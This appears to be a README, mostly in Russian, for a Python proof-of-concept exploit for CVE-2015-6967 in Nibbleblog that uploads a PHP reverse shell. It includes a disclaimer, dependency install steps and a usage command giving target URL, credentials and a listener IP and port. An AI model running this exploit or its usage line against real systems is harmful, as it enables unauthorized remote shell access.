
CVE-2015-6967 PoC Exploit
CVE-2015-6967 PoC Exploit
Этот скрипт на Python эксплуатирует уязвимость в Nibbleblog (CVE-2015-6967) для загрузки reverse shell на уязвимую цель. Скрипт принимает от пользователя URL цели, учетные данные и ваш IP/порт хоста, после чего использует уязвимость, загружая PHP reverse shell.
Этот скрипт предназначен только для образовательных целей. НЕ используйте его для незаконных действий. Всегда получайте явное разрешение перед тестированием или эксплуатацией любых уязвимостей на системах, которые вам не принадлежат или на доступ к которым у вас нет разрешения.
requests libraryargparse librarycolorama librarypyfiglet libraryВы можете установить необходимые зависимости с помощью следующей команды:
pip install requests colorama pyfiglet
Для запуска скрипт требует несколько параметров:
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100